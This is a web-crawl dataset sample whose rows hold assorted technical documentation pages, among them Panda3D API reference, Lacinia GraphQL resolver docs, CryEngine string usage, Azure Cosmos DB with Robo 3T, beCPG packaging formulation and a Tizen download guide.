content
stringlengths
0
557k
url
stringlengths
16
1.78k
timestamp
timestamp[ms]
dump
stringlengths
9
15
segment
stringlengths
13
17
image_urls
stringlengths
2
55.5k
netloc
stringlengths
7
77
. To create a client QoS policy, stop and restart Lync 2010 or Lync 2010 Attendant for the changes to take effect. See Also Tasks Creating a Quality of Service (QoS) Policy on Lync Server
https://docs.microsoft.com/en-us/previous-versions/office/skype-server-2010/gg405414(v=ocs.14)?redirectedfrom=MSDN
2020-05-25T09:31:54
CC-MAIN-2020-24
1590347388012.14
[]
docs.microsoft.com
Table of Contents Product Index The head and body for Tanany were sculpted in Zbrush + 3dsmax, and the toon skins were created using photo then retouch up for final anime textures. Tanany also comes with custom sculpted longer nails as well as custom lashes for the anime eyes. The shape figure required custom JCMs for hip, elbows, and shoulders and also the big beautiful eyes have morph fixes for blinking and winking. Keyed morphs for the arm and knees. Mix Tanany with Genesis 8 females to have that special anime look. Have.
http://docs.daz3d.com/doku.php/public/read_me/index/58645/start
2020-05-25T09:02:13
CC-MAIN-2020-24
1590347388012.14
[]
docs.daz3d.com
Coded file, or using thread syncronization locks. Doing so may prevent the load test engine from running as efficiently as it should, and thus reduce the load that can be generated. The load test / Web test runtime engine is designed with the assumption that coded Web tests (and Web test plug-ins) do not block. The reason for this is that the load test runtime engine takes advantage of the async I/O capabilities of the System.Net.HttpWebRequest (which is used to send the HTTP requests) so that it does not require a separate thread for each virtual user running a test. This allows larger number of users to be simulated using less memory. The way this works is that the load test engine has a small pool of threads (one per processor) that is used to start new Web test iterations. This includes calling the PreWebTest and the first call to the request enumerator for a coded Web test. This thread then issues the first Web test request asyncronously. As soon as that request has been issued, the thread is free to go start another Web test iteration for a different virtual user. This usually works works great, but if the coded Web test blocks in the PreWebTest event handler (or request enumerator) then this thread blocks and cannot go on to starting another Web test. If the thread blocks long enough, the result could be that the actual number of Web tests running in parallel may not reach the number of virtual users specified in the load test. To complete the explanation: the thread pool mentioned above is only used to start the Web test and run the first request. When a Web test request completes asyncronously, the completion of request is processed on one of the threads in the .NET I/O completion thread pool. The depedent requests are then submitted (again async) on one of these threads. When think time is enabled, there is yet another thread that submits async requests after the appropriate think time has passed. A good way to tell if your Web test code is using too much time is to monitor the performance counter "% Time in WebTest Code". You can find this performance counter in the load test results viewer's "Counters" tree under "Overall" / "Test" and add it to one of the graphs.
https://docs.microsoft.com/en-us/archive/blogs/billbar/coded-web-tests-and-web-test-plug-ins-should-not-block-the-thread
2020-02-17T02:18:09
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
panda3d.core.NotifyCategory¶ - class NotifyCategory¶ setSeverity(severity: NotifySeverity) → None¶ Sets the severity level of messages that will be reported from this Category. This allows any message of this severity level or higher. isOn(severity: NotifySeverity) → bool¶ Returns true if messages of the indicated severity level ought to be reported for this Category. isSpam() → bool¶) → ostream¶ Begins a new message to this Category at the indicated severity level. If the indicated severity level is enabled, this writes a prefixing string to the Notify.out()stream and returns that. If the severity level is disabled, this returns Notify.null(). - Return type - getNumChildren() → size_t¶ Returns the number of child Categories of this particular Category. - Return type size_t getChild(i: size_t) → NotifyCategory¶ Returns the nth child Category of this particular Category. - Return type - - static setServerDelta(delta: int) → None¶ Sets a global delta (in seconds) between the local time and the server’s time, for the purpose of synchronizing the time stamps in the log messages of the client with that of a known server. - property severity¶ Getter Setter Sets the severity level of messages that will be reported from this Category. This allows any message of this severity level or higher. - Return type NotifySeverity
https://docs.panda3d.org/1.10/cpp/reference/panda3d.core.NotifyCategory
2020-02-17T01:22:25
CC-MAIN-2020-10
1581875141460.64
[]
docs.panda3d.org
Attaching Resolvers¶ Schemas start as EDN files, which has the advantage that symbols do not have to be quoted (useful when using the list and non-null qualifiers on types). However, EDN is data, not code, which makes it nonsensical to defined field resolvers directly in the schema. One option is to use assoc-in to attach resolvers after reading the EDN, but before invoking com.walmartlabs.lacinia.schema/compile. This can become quite cumbersome in practice. Instead, the standard approach is to put keyword placeholders in the EDN file, and then use com.walmartlabs.lacinia.util/attach-resolvers, which walks the schema tree and makes the changes, replacing the keywords with the actual functions. (ns org.example.schema (:require [clojure.edn :as edn] [clojure.java.io :as io] [com.walmartlabs.lacinia.schema :as schema] [com.walmartlabs.lacinia.util :as util] [org.example.db :as db])) (defn star-wars-schema [] (-> (io/resource "star-wars-schema.edn") slurp edn/read-string (util/attach-resolvers {:hero db/resolve-hero :human db/resolve-human :droid db/resolve-droid :friends db/resolve-friends}) schema/compile)) The attach-resolvers step occurs before the schema is compiled. Resolver Factories¶ There are often cases where many fields will need very similar field resolvers. A second resolver option exist for this case, where the schema references a field resolver factory rather than a field resolver itself. In the schema, the value for the :resolve key is a vector of a keyword and then additional arguments: {:queries {:hello {:type String :resolve [:literal "Hello World"]}}} In the code, you must provide the field resolver factory: (ns org.example.schema (:require [clojure.edn :as edn] [clojure.java.io :as io] [com.walmartlabs.lacinia.schema :as schema] [com.walmartlabs.lacinia.util :as util])) (defn ^:private literal-factory [literal-value] (fn [context args value] literal-value)) (defn hello-schema [] (-> (io/resource "hello.edn") slurp edn/read-string (util/attach-resolvers {:literal literal-factory}) schema/compile)) The attach-resolvers function will see the [:literal "Hello World"] in the schema, and will invoke literal-factory, passing it the "Hello World" argument. literal-factory is responsible for returning the actual field resolver. A field resolver factory may have any number of arguments. Common uses for field resolver factories: - Mapping GraphQL field names to Clojure hyphenated names - Converting or formatting a raw value into a selected value - Accessing a deeply nested value in a structure
https://lacinia.readthedocs.io/en/latest/resolve/attach.html
2020-02-17T00:16:20
CC-MAIN-2020-10
1581875141460.64
[]
lacinia.readthedocs.io
Packaging Packaging levels Product packaging are organized in 3 levels, defined by Wikipedia as: Primary packaging This type of packaging is generally identified as the consumer sales unit (CSU), which means the smallest quantity offered to the consumer. It can be the consumer sales unit directly, but in most cases, it refers to a consumer units reunification into a commercial lot (Example : a carboard pack made of 12 natural yogurts). This packaging wraps the minimal products quantity which a client can buy: it will be removed by the final consumer. According to the 94/62/CE directive « Packaging and packaging wastes » : « The primary packaging is the packaging conceived to form, on the ales outlet, a sales unit for the final user or the consumer ». Secondary packaging The secondary packaging gathers intermediary grouping of CSU which should be easily handling and movable to the store shelves by distributors or sales outlet operators (e.g. American box). This packaging is studied to facilitate the layout and the recycling done by the distributor. The most common secondary packaging: - Carton packs with easy opening or opening with flaps ; - Boxes or flow-packs allowing the gathering during promotions. According to the 94/62/CE directive « Packaging and packaging wastes » : « The secondary packaging is the packaging designed to constitute, at the sales outlet, a group with a great number of CSU » . - Whether it is sold unaltered to the final user or the consumer ; - Whether it only helps to fill the sales outlet displays, It must be removed from the product without having its characteristics altered ». Tertiary packaging It corresponds to logistics handling variants packaging : these ones allow the transportation of a huge quantity of products to stores or to the industrial. It can be complete pallets from a single reference, of « variegated » pallets (comprising a determined range), and their accessories (films, identification labeling, shrouds, angle iron, etc). The most common tertiary packaging: - transportation boxes (American box); - pallets; - retractable films ; logistics labels, etc. Packaging formulation The packaging formulation allows the calculation of : - The cost linked to the packagings ; - Tares, net weights and gross weights by packaging level ; - Dimensions by packaging level ; Simple packagings To add simple packagings to a product, there are two possibilities : - Go to the product « Packaging » section and click on the arrow situated at the right of « Create a new product », then, choose « Packaging ». Fill out the name of the packaging (mandatory field) as well as its description, its unit and click on « Save ». - Go to the product « Packaging » section and click on « Add » which allows you to select a pre recorded packaging (according to the step previously described). In both cases: - Click on the « Quantity » field to fill the packaging quantities foresaw by level ; - Click on the « Unit» field to choose the unit corresponding to the quantity previously chosen. This unit can be of type « Each », « Product per packaging » (allowing to say that we want to put 15 CSU per package), « Meters » or again « Square meters » ; - Click on the « Packaging level» field to choose the packaging level : primary, secondary, tertiary ; - Click on the « Master » field to say which packaging of the level have the biggest dimensions. It’s possible to know the dimensions of CSU of the primary, secondary or tertiary level. It avoids the filling of each packaging’s dimensions because we only consider the dimensions of the master product of each level. In the case in which the UVC’s dimensions are bigger than the packaging’s ones (exampke : chicken), it is necessary to add the aspect « Dimensions on the finished product » and fill the fields « Lenght/Width/Height ». Then, it’s possible to navigate each entity (packaging) by simply clicking on it. Thus, we access the properties and the different lists of the packaging. By clicking on « Properties » and « Edit the properties », you can find, at the bottom of the page, the « Tare » field which allows the filling of the packaging weight. By clicking on the « Costs » list, it’s possible to complete the packaging costs in the « Value » column and its unit in the « Unit » column. « N-1 » and « N+1 » fields represent the costs of the previous and next year respectively. The « Plants » field is here to complete the costs linked to the plant on the product model (example : storage cost of the plant 1). By clicking on the « Purchase price » list, you can complete the costs linked to the purchase volumes, the year and the supplier (example : the purchasing of 100 cardboards won’t cost the same price, as the purchasing of 10 000 cardboards). In other words, this list allows to stock the price proposals made by the suppliers. Click on « Formulate » to compute, for instance, the costs linked to the packaging which will be found in the « Costs » section of the product. Packaging kits The packaging kits gather a large number of primary and/or secondary and/or tertiary packaging. They are very useful in two cases : - When packaging are common (qualitatively and quantitatively) to many products. Example: 3 packaging kits for 1000 products ; - When the palletisation have to be mentioned. Example : pallet height, number of layers, number of cardboards per layer. To add packaging kits to a product, there are two possibilities : - Go to the « Packaging » section of this latter and click on the arrow at the right of « Create a product » and choose « Packaging kit ». Complete this latter’s name (mandatory field), its description, its unit and click on « Save ». - Go to the « Packaging » section of this latter and click on « Add » which allows the selection of a packaging kit pre recorded. In both cases, packaging contained in the kit are added and completed in the same way of which described in the « Simple packaging » section. « Palletisation » aspect addition Palletisation aspect allows to specify the number of packages per pallet, the number of layers per pallet and the number of packages per layer. It can be added on the packaging kit by going to Product>Packaging>Kit>Properties and by clicking on « Add an aspect » and then by selecting « Palletisation ». New properties are available on the palletisation kit : To complete it, click on « Edit the properties ». Then, you have access to the kit designation data (name, description etc.). Concerning the palletisation data, you’ll have to complete : - The number of layers per pallet: here 2; - The number of packagings per layer (in a pallet) : here 6; - The number of packagings in the pallet last layer : here 4; - The total number of packagings per pallet : here 6*2 + 4 = 16. Then, go to the « Packaging » list to complete the kit with its packagings (cf. Simple packagings). Then, go back to the product « Packaging » list and click on « Formulate » to calculate the costs due to the packagings. Eventually, go to the « Reports » list and click on « Create reports » to obtain the production technical sheet on which will the packaging description will appear. To indicate the packaging dimensions, click on each master packaging and go to its properties. Click on « Add an aspect » and choose « Size ». It is then possible to add the dimensions (in mm) of the packaging. After generating the reports, we obtain:
http://docs.becpg.fr/en/utilization/packaging-formulation.html
2020-02-17T00:22:14
CC-MAIN-2020-10
1581875141460.64
[]
docs.becpg.fr
Overview CryENGINE has a custom reference-counted string class CryString (declared in CryString.h) which is a replacement for the STL std::string. It should always be preferred over std::string. For convenience, string is used as a typedef for CryString. How to Use Strings as Key Values for STL Containers The following code shows good (efficient) and bad usage: const char *szKey= "Test"; map< string, int >::const_iterator iter = m_values.find( CONST_TEMP_STRING( szKey ) ); // Good way map< string, int >::const_iterator iter = m_values.find( szKey ); // Bad way, don't do it like this! By using the suggested method, you avoid allocation/deallocation and copying for a temporary string object. This is a common problem for most string classes. By simply using the macro CONST_TEMP_STRING, we trick the string class to use the pointer directly without freeing the data afterwards. Further Usage Tips - Do not use std::string or std::wstring, just string and wstring and never include the standard string header <string>. - Use the c_str()method to access the contents of the string. - Never modify memory returned by the c_str()method since strings are reference-counted and a wrong string instance could be affected. - Do not pass strings via abstract interfaces; all interfaces should use const char* in interface methods. - CryString has a combined interface of std::string and MFC CString, so both interface types can be used for string operations. - Avoid doing many string operations at run-time as they are often causing memory reallocations. - For fixed size strings (e.g. 256 chars) use CryFixedStringT(should be preferred over static char arrays). Overview Content Tools
https://docs.cryengine.com/display/SDKDOC4/CryString
2020-02-17T01:22:19
CC-MAIN-2020-10
1581875141460.64
[]
docs.cryengine.com
Here you'll find the configurable properties of our reusable CELUM Connectors. In contrast to the extensions that run inside CELUM, connectors run in some 3rd-party system and connect to CELUM from the outside via an API. So the two systems must be able to communicate between one another in order for this to work.
https://docs.brix.ch/de/celum_connectors
2020-02-17T01:49:26
CC-MAIN-2020-10
1581875141460.64
[]
docs.brix.ch
Use Robo 3T with Azure Cosmos DB's API for MongoDB To connect to Cosmos account using Robo 3T, you must: - Download and install Robo 3T - Have your Cosmos DB connection string information Connect using Robo 3T To add your Cosmos account to the Robo 3T connection manager, perform the following steps: Retrieve the connection information for your Cosmos account configured with Azure Cosmos DB's API MongoDB using the instructions here. Run Robomongo.exe Click the connection button under File to manage your connections. Then, click Create in the MongoDB Connections window, which will open up the Connection Settings window. In the Connection Settings window, choose a name. Then, find the Host and Port from your connection information in Step 1 and enter them into Address and Port, respectively. On the Authentication tab, click Perform authentication. Then, enter your Database (default is Admin), User Name and Password. Both User Name and Password can be found in your connection information in Step 1. On the SSL tab, check Use SSL protocol, then change the Authentication Method to Self-signed Certificate. Finally, click Test to verify that you are able to connect, then Save. Next steps - Learn how to use Studio 3T with Azure Cosmos DB's API for MongoDB. - Explore MongoDB samples with Azure Cosmos DB's API for MongoDB. Feedback
https://docs.microsoft.com/en-us/azure/cosmos-db/mongodb-robomongo
2020-02-17T02:15:51
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
COM, DCOM, and Type Libraries Component Object Model (COM) and Distributed Component Object Model (DCOM) use Remote Procedure Calls (RPC) to enable distributed component objects to communicate with each other. Thus, a COM or DCOM interface defines the identity and external characteristics of a COM object. It forms the means by which clients can gain access to an object's methods and data. With DCOM, this access is possible regardless of whether the objects exist in the same process, different processes on the same machine, or on different machines. As with RPC client/server interfaces, a COM or DCOM object can expose its functionality in a number of different ways and through multiple interfaces.. This can occur even if the object and client applications were written in different programming languages. The COM/DCOM run-time environment can also use a type library to provide automatic cross-apartment, cross-process, and cross-machine marshaling for interfaces described in type libraries. Characteristics of an Interface You define the characteristics of an interface in an interface definition (IDL) file and an optional application configuration file (ACF): - The IDL file specifies the characteristics of the application's interfaces on the wire — that is, how data is to be transmitted between client and server, or between COM objects. - The ACF file specifies interface characteristics, such as binding handles, that pertain only to the local operating environment. The ACF file can also specify how to marshal and transmit a complex data structure in a machine-independent form. For more information on IDL and ACF files, see The IDL and ACF Files. The IDL and ACF files are scripts written in Microsoft Interface Definition Language (MIDL), which is the Microsoft implementation and extension of the OSF-DCE interface definition language (IDL). The Microsoft extensions to the IDL language enable you to create COM interfaces and type libraries. The compiler, Midl.exe, uses these scripts to generate C-language stubs and header files as well as type library files. The MIDL Compiler Depending on the contents of your IDL file, the MIDL compiler will generate any of the following files. A C-language proxy/stub file, an interface identifier file, a DLL data file, and a related header file for a custom COM interface. The MIDL compiler generates these files when it encounters the object attribute in an interface attribute list. For more detailed information on these files, see Files Generated for a COM Interface. A compiled type library (.tlb) file and related header file. MIDL generates these files when it encounters a library statement in the IDL file. For general information about type libraries, see Contents of a Type Library, in the Automation Programmer's Reference. C/C++-language client and server stub files and related header file for an RPC interface. These files are generated when there are interfaces in the IDL file that do not have the object attribute. For an overview of the stub and header files, see General Build Procedure. For more detailed information, see Files Generated for an RPC Interface.
https://docs.microsoft.com/en-us/windows/win32/midl/com-dcom-and-type-libraries
2020-02-17T01:53:21
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
You: Figure: User scenario When you stop the download: download_cancel()function. It changes the download state to DOWNLOAD_STATE_CANCELED. From this state, you can restart the download with the download_start()function. download_destroy()function. To use the functions and data types of the Download API, include the <download.h> header file in your application: The downloading library needs no initialization prior to the API usage. default_NONE default state.);
https://docs.tizen.org/application/native/guides/connectivity/download
2020-02-17T01:48:30
CC-MAIN-2020-10
1581875141460.64
[]
docs.tizen.org
Rigging the Characters There are few boid requirements: - Must be a skinned character. - LOD's (especially LOD1 for the ragdoll). CRYENGINE 3.5 - LOD's in CHR's The skin with LOD's needs to be re-exported from DCC tools as a .skin. LOD's in CHR's are not supported any more. Animations also need to be re-exported/imported through the Animation Compression Editor and Animation Importer tool as well. Simple boids like insects or fish can have one single bone and point to null animations. Animation There are three animations boid characters use or require: - "swim_loop" - "fly_loop" - "landing" Don't forget that each boid character needs a CAL file that points to its animations. As you see below, these three animations will be slightly scaled according to the speed of the boid. Entity Properties Overview Content Tools
https://docs.cryengine.com/pages/?pageId=23308008&sortBy=createddate
2020-02-17T00:16:20
CC-MAIN-2020-10
1581875141460.64
[]
docs.cryengine.com
Microsoft Partner Summits coming to a city near you in October Join us during October for 2 days of training on Microsoft’s latest products. This series is designed specifically for sales and marketing professionals and will provide you with the sales, marketing and licensing knowledge to grow your business with Office, Office 365, Windows, Windows Server and devices. As well as the agenda sessions there will be ample time to network with Microsoft subject matter experts to ask any questions you have as well as networking with likeminded Microsoft Partners. You will also have the opportunity to get “hands on” with the latest devices.. Mark these dates in your calendar and register today to secure your spot. We look forward to seeing you there!
https://docs.microsoft.com/en-us/archive/blogs/auspartners/microsoft-partner-summits-coming-to-a-city-near-you-in-october
2020-02-17T02:14:18
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
Deployment of Pre-Trained Models on Azure Container Services This post is authored by Mathew Salvaris, Ilia Karmanov and Jaya Mathew. Data scientists and engineers routinely encounter issues when moving their final functional software and code from their development environment (laptop, desktop) to a test environment, or from a staging environment to production. These difficulties primarily stem from differences between the underlying software environments and infrastructure, and they eventually end up costing businesses a lot of time and money, as data scientists and engineers work towards narrowing down these incompatibilities and either modify software or update environments to meet their needs. Containers end up being a great solution in such scenarios, as the entire runtime environment (application, libraries, binaries and other configuration files) get bundled into a package to ensure smooth portability of software across different environments. Using containers can, therefore, improve the speed at which apps can be developed, tested, deployed and shared among users working in different environments. Docker is a leading software container platform for enabling developers, operators and enterprises to overcome their application portability issue. The goal of Azure Container Services (ACS) is to provide a container hosting environment by using popular open-source tools and technologies. Like all software, deploying machine learning (ML) models can be tricky due to the plethora of libraries used and their dependencies. In this tutorial, we will demonstrate how to deploy a pre-trained deep learning model using ACS. ACS enables the user to configure, construct and manage a cluster of virtual machines preconfigured to run containerized applications. Once the cluster is setup, DC/OS is used for scheduling and orchestration. This is an ideal setup for any ML application since Docker containers facilitate ultimate flexibility in the libraries used, are scalable on demand, and all while ensuring that the application is performant. The Docker image used in this tutorial contains a simple Flask web application with Nginx web server and uses Microsoft's Cognitive Toolkit (CNTK) as the deep learning framework, with a pretrained ResNet 152 model. Our web application is a simple image classification service, where the user submits an image, and the application returns the class the image belongs to. This end-to-end tutorial is split into four sections, namely: - Create Docker image of our application (00_BuildImage.ipynb). - Test the application locally (01_TestLocally.ipynb). - Create an ACS cluster and deploy our web app (02_TestWebApp.ipynb). - Test our web app (03_TestWebApp.ipynb, 04_SpeedTestWebApp.ipynb). Each section has an accompanying Jupyter notebook with step-by-step instructions on how to create, deploy and test the web application. Create Docker Image of the Application (00_BuildImage.ipynb) The Docker image in this tutorial contains three main elements, namely: the web application (web app), pretrained model, and the driver for executing our model, based on the requests made to the web application. The Docker image is based on an Ubuntu 16.04 image to which we added the necessary Python dependencies and installed CNTK (another option would be to test our application in an Ubuntu Data Science Virtual Machine from Azure portal). An important point to be aware of is that the Flask web app is run on port 5000, so we have created a proxy from port 88 to port 5000 using Nginx to expose port 88 in the container. Once the container is built, it is pushed to a public Docker hub account so that the ACS cluster can access it. Test the Application Locally (01_TestLocally.ipynb) Having short feedback loops while debugging is very important and ensures quick iterations. Docker images allow the user to do this as the user can run their application locally and check the functionality, before going through the entire process of deploying the app to ACS. This notebook outlines the process of spinning up the Docker container locally and configuring it properly. Once the container is up and running the user can send requests to be scored using the model and check the model performance. Create an ACS Cluster and Deploy the Web App (02_DeployOnACS.ipynb) In this notebook, the Azure CLI is used to create an ACS cluster with two nodes (this can also be done via the Azure portal). Each node is a D2 VM, which is quite small but sufficient for this tutorial. Once ACS is setup, to deploy the app, the user needs to create and SSH tunnel into the head node. This ensures that the user can send the JSON application schema to Marathon. From the schema, we have mapped port 80 of the host to port 88 on the port (users can choose different ports as well). This tutorial only deploys one instance of the application (the user can scale this up, but it will not be discussed in here). Marathon has a web dashboard that can be accessed through the SSH tunnel by simply pointing the web browser to the tunnel created for deploying the application schema. Test the Web App (03_TestWebApp.ipynb, 04_SpeedTestWebApp.ipynb) Once the application has been successfully deployed the user can send scoring requests. The illustration below shows examples of some of the results returned from the application. The ResNet 152 model seems to be fairly accurate, even when parts of the subject (in the image) are occluded. Further, the average response time for these requests is less than a second, which is very performant. Note that this tutorial was run on a virtual machine in the same region as the ACS. Response times across regions may be slower but the performance is still acceptable for a single container on a single VM. After running the tutorial, to delete ACS and free up other associated Azure resources, run the cells at the end of 02_TestWebApp.ipynb notebook. We hope you found this interesting - do share your thoughts or comments with us below. Mathew, Ilia & Jaya References: - - - -
https://docs.microsoft.com/en-us/archive/blogs/machinelearning/deployment-of-pre-trained-models-on-azure-container-services
2020-02-17T02:36:53
CC-MAIN-2020-10
1581875141460.64
[array(['https://msdnshared.blob.core.windows.net/media/2017/05/052517_1718_Deploymento1.png', None], dtype=object) ]
docs.microsoft.com
Offering template maybe seen as standard contract for particular service, where some parameters are variable per Agent. Offering template shipped with service module. Each service module has unique offering template. Both Agent and Client have identical offering template, when choose to use same service module. Offering template - is JSON schema that includes: Offering schema - offering fields to be filled by Agent Core fields - fields that common for any service. They are required for proper Privatix core operation. They are generic and doesn't contain any service specifics. Service custom fields - (aka additional parameters) any fields that needed for particular service operation. They do not processed by Privatix core, but passed to Privatix adapter for any custom logic. UI schema - schema that can be used by GUI to display fields for best user experience Each Offering template has unique hash. Any offering always includes in its body hash of corresponding offering template. That's how offering is linked to template and related service module. When Client receives offering, he checks that: Offering template with noted hash exists in Client's database Offering message passes validation according to offering template Such validation ensures, that Agent and Client both has: exactly same offering template offering is properly filled according to offering template schema Schema example {"schema": {"title": "Privatix VPN offering","type": "object","properties": {"serviceName": {"title": "name of service","type": "string","description": "Friendly name of service","const": "Privatix VPN"},"templateHash": {"title": "offering template hash","type": "string","description": "Hash of this offering template"},"nonce": {"title": "nonce","type": "string","description": "uuid v4. Allows same offering to be published twice, resulting in unique offering hash."},"agentPublicKey": {"title": "agent public key","type": "string","description": "Agent's public key"},"supply": {"title": "service supply","type": "number","description": "Maximum Number of concurrent orders that can coexist"},"unitName": {"title": "unit name","type": "string","description": "name of single unit of service","examples": ["MB","kW","Lesson"]},"unitPrice": {"title": "unit price","type": "number","description": "Price in PRIX for single unit of service."},"minUnits": {"title": "min units","type": "number","description": "Minimum number of units Agent expect to sell. Deposit must suffice to buy this amount."},"maxUnits": {"title": "max units","type": "number","description": "Maximum number of units Agent will sell."},"billingType": {"title": "billing type","type": "string","enum": ["prepaid","postpaid"],"description": "Model of billing: postapaid or prepaid"},"billingFrequency": {"title": "billing frequency","type": "number","description": "Specified in units of servce. Represent, how often Client MUST send payment cheque to Agent."},"maxBillingUnitLag": {"title": "max billing unit lag","type": "number","description": "Maximum tolerance of Agent to payment lag. If reached, service access is suspended."},"maxSuspendTime": {"title": "max suspend time","type": "number","description": "Maximum time (seconds) Agent will wait for Client to continue using the service, before Agent will terminate service."},"maxInactiveTime": {"title": "max inactive time","type": "number","description": "Maximum time (seconds) Agent will wait for Client to start using the service for the first time, before Agent will terminate service."},"setupPrice": {"title": "setup fee","type": "number","description": "Setup fee is price, that must be paid before starting using a service."},"freeUnits": {"title": "free units","type": "number","description": "Number of first free units. May be used for trial period."},"country": {"title": "country of service","type": "string","description": "Origin of service"},"additionalParams": {"title": "Privatix VPN service parameters","type": "object","description": "Additional service parameters","properties": {"minUploadSpeed": {"title": "min. upload speed","type": "string","description": "Minimum upload speed in Mbps"},"maxUploadSpeed": {"title": "max. upload speed","type": "string","description": "Maximum upload speed in Mbps"},"minDownloadSpeed": {"title": "min. download speed","type": "string","description": "Minimum download speed in Mbps"},"maxDownloadSpeed": {"title": "max. upload speed","type": "string","description": "Maximum download speed in Mbps"}},"required": []}},"required": ["serviceName","supply","unitName","billingType","setupPrice","unitPrice","minUnits","maxUnits","billingInterval","maxBillingUnitLag","freeUnits","templateHash","product","agentPublicKey","additionalParams","maxSuspendTime","country"]},"uiSchema": {"agentPublicKey": {"ui:widget": "hidden"},"billingInterval": {"ui:help": "Specified in unit_of_service. Represent, how often Client MUST provide payment approval to Agent."},"billingType": {"ui:help": "prepaid/postpaid"},"country": {"ui:help": "Country of service endpoint in ISO 3166-1 alpha-2 format."},"freeUnits": {"ui:help": "Used to give free trial, by specifying how many intervals can be consumed without payment"},"maxBillingUnitLag": {"ui:help": "Maximum payment lag in units after, which Agent will suspend serviceusage."},"maxSuspendTime": {"ui:help": "Maximum time without service usage. Agent will consider, that Client will not use service and stop providing it. Period is specified in minutes."},"maxInactiveTime": {"ui:help": "Maximum time Agent will wait for Client to start using the service for the first time, before Agent will terminate service. Period is specified in minutes."},"minUnits": {"ui:help": "Agent expects to sell at least this amount of service."},"maxUnits": {"ui:help": "Agent will sell at most this amount of service."},"product": {"ui:widget": "hidden"},"setupPrice": {"ui:help": "setup fee"},"supply": {"ui:help": "Maximum supply of services according to service offerings. It represents maximum number of clients that can consume this service offering concurrently."},"template": {"ui:widget": "hidden"},"unitName": {"ui:help": "MB/Minutes"},"unitPrice": {"ui:help": "Price in PRIX for one unit of service."},"additionalParams": {"ui:widget": "hidden"}}}
https://docs.privatix.network/privatix-core/core/messaging/offering/offering-template
2020-02-17T01:09:00
CC-MAIN-2020-10
1581875141460.64
[]
docs.privatix.network
About Me I’ve been working with British and International doctors since 2011, receiving referrals from Professional Support Units throughout the UK. My professional background has been within Communication Training as a consultant and manager in the UK, Europe, Asia and the Middle East. Don’t hesitate to contact me with any questions or general enquiry you might have. I’m more than happy to meet for an initial chat.
https://comms4docs.com/about/
2020-02-17T01:28:40
CC-MAIN-2020-10
1581875141460.64
[]
comms4docs.com
Real Geeks integrates with Realvolve. Every lead added to Real Geeks will be automatically sent over to Realvolve. New leads and updates to existing leads are sent. Note activities will create notes in Realvolve. Changes made in Realvolve do not propagate to Real Geeks. This integration is one way from Real Geeks to Realvolve. The table below shows which lead fields from Real Geeks are sent to create a contact in Realvolve Realvolve is configured as a custom Destination for your site. You can configure in the Lead Router: You can choose to select a User – an Agent or Lender. If you do so only leads assigned to that user are sent to Realvolve. Note that you can connect to Realvolve multiple times, each with a different user. Only leads created after you connected will be sent to Realvolve. If you want to import all your existing leads into Realvolve see Import existing leads below. In Realvolve click Settings on the top right corner of your dashboard Then click on Integrations Your Utility API Key will be on the bottom of the page Only leads created after you connected to Realvolve will be sent in real time. If you want to import all your existing leads, first you need to export from Real Geeks then import into Realvolve. Follow our steps to export a CSV file from your Lead Manager Then follow Realvolve instructions on how to import contacts from a CSV file:
https://docs.realgeeks.com/realvolve
2020-02-17T01:29:39
CC-MAIN-2020-10
1581875141460.64
[]
docs.realgeeks.com
reveal_quick_checkout The reveal_quick_checkout shortcode is used when you want to let customers purchase a product on a page, but don't want the checkout page to be shown initially. This shortcode will display a button that reveals the checkout page after being clicked.. - checkout_action: Defaults to 'lightbox'. You can use 'reveal' to have the checkout form be revealed on-page after clicking. - clear_cart: Whether the customer's cart should be cleared before adding this product to the cart. Default is true. - checkout_text: Text to display on the checkout. Default is "Buy Now". Common examples of shortcode usage: Display a button for a single product with product ID 123. [reveal_quick_checkout id="123"] Display a button for a single product with product ID 123 and variation ID 1. [reveal_quick_checkout id="123" variation_id="1"] Display a button for a purchasing two of a product with product ID 123. [reveal_quick_checkout id="123" quantity="2"] Display a button for purchasing a product with product ID 123 and text on the button that says "Purchase Now!". [reveal_quick_checkout id="123" checkout_text="Purchase Now!"] Display a button for purchasing a product with product ID 123 that is revealed on-page (not in a lightbox). [reveal_quick_checkout id="123" checkout_action="reveal"]
https://docs.amplifyplugins.com/article/224-revealquickcheckout
2020-02-17T00:25:01
CC-MAIN-2020-10
1581875141460.64
[]
docs.amplifyplugins.com
All about Missing dSYMs *********************** .. raw:: html Fabric includes a tool to automatically upload your project's dSYM. The tool is executed through the :code:`/run` script, which is added to your Run Script Build Phase during the onboarding process. There can be certain situations however, when dSYM uploads fail because of unique project configurations or :ref:`if you're using Bitcode
https://docs.fabric.io/apple/_sources/crashlytics/missing-dsyms.txt
2020-02-17T01:16:44
CC-MAIN-2020-10
1581875141460.64
[]
docs.fabric.io
Eject or Unplug a Device Applies To: Windows Server 2008 This topic provides a procedure that you can use to safely eject or unplug a removable device. Warning Unplugging or ejecting a device that supports safe removal without first using the Safe Removal application to warn the system can cause data to be lost or your system to become unstable. For example, if a device is unplugged during a data transfer, data loss is likely. If you use Safe Removal, however, you can warn the system before you unplug or eject a device, preventing possible loss of data. Any user account can be used to complete this procedure. To eject or unplug a device. Note For removable storage devices that can safely be removed while the computer is on, the computer disables write caching by default. It does this so that the devices can be removed without loss of data. Additional references Uninstalling and Reinstalling Devices Understanding the Process of Uninstalling Devices Undock a Portable Computer
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc770831%28v%3Dws.10%29
2020-02-17T02:20:39
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
